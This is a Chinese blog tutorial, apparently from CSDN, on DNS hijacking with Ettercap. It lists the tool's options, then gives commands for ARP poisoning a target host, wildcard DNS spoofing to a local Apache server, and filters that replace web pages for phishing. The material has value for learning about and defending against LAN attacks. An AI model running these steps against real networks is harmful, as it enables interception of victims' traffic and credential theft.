• DNS劫持案列


    注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

    一、ARP协议简介

            ARP即地址解析协议,用于现实从ip地址到MAC地址的映射,即询问目标ip对应的MAC地址

            我们能够通过修改mac地址来达到中间人拦截、局域网流控、流量欺骗等情况。

    二、Ettercap简介

    三、Ettercap常用指令

            1.用户界面类型

            -T,        -text        使用只显示字符的界面

            -q,        -quiet        安静模式,不显示抓到的数据包内容

            -G,        -gtk        使用GTK+GUI,开启图形化模式

            2.日志选项

            -w,        -write        将嗅探到的数据写入pcap文件

            -L,        -log        此处记录所有流量

            3.通用选项

            -i,        -iface        使用该网络接口

            -l,        -liface        显示所有的网络接口

            -P,        -plugin        开始该插件

            -F,        -filter        加载过滤器(内容过滤 器)

            4.嗅探与攻击选项

            -M,        mitm<方法:ARGS>        执行mitm攻击

    四、Ettercap案例

            1.开启apache服务

            编辑html文件:leafpad  /var/www/html/

            service  apache2  start

            2.编辑ettercap配置文件

            leafpad  /etc/ettercap/etter.dns

            添加

                    *                        A        198.168.199.127        根据本地ip填写

                    *                        PTR        192.168.199.127        根据本地ip填写

            3.Ettercap使用图形化

            Ettercap -G

            4.命令行测试

            ettercap  -qT  -i  eth0  -M  arp:remote  - w  1.pcap  /kali地址//靶机主机/

            Ettercap替换网页内容---钓鱼

            1.准备过滤脚本

            官方提示脚本:        cd  /usr/share/ettercap/

            2.编译脚本

            etterfilter  head.filter  -o  head.ef                   //head.filter为脚本名字

            3.导入脚本

             Filters -> Load  a  Filter..        选择 脚本文件

            4.继续添加Plugins中的dns_spoof

             5.最后都要选择ARP  poisoning...开始

  • 相关阅读:
    【无标题】
    知识星球2023年10月PHP函数小挑战
    C语言_字符串与指针的爱恨情仇
    【基础】Linux 基础
    量子计算新突破!来源于150年前的思想实验
    03-rnn-由国家名和开始字符生成1个name
    HaaS学习笔记 | 最详细的HaaS Python轻应用开发快速入门教程
    4年手工测试,下一步转测试开发还是自动化测试?
    Eureka简介与使用浅析
    MFF论文笔记
  • 原文地址:https://blog.csdn.net/qq_58000413/article/details/126630318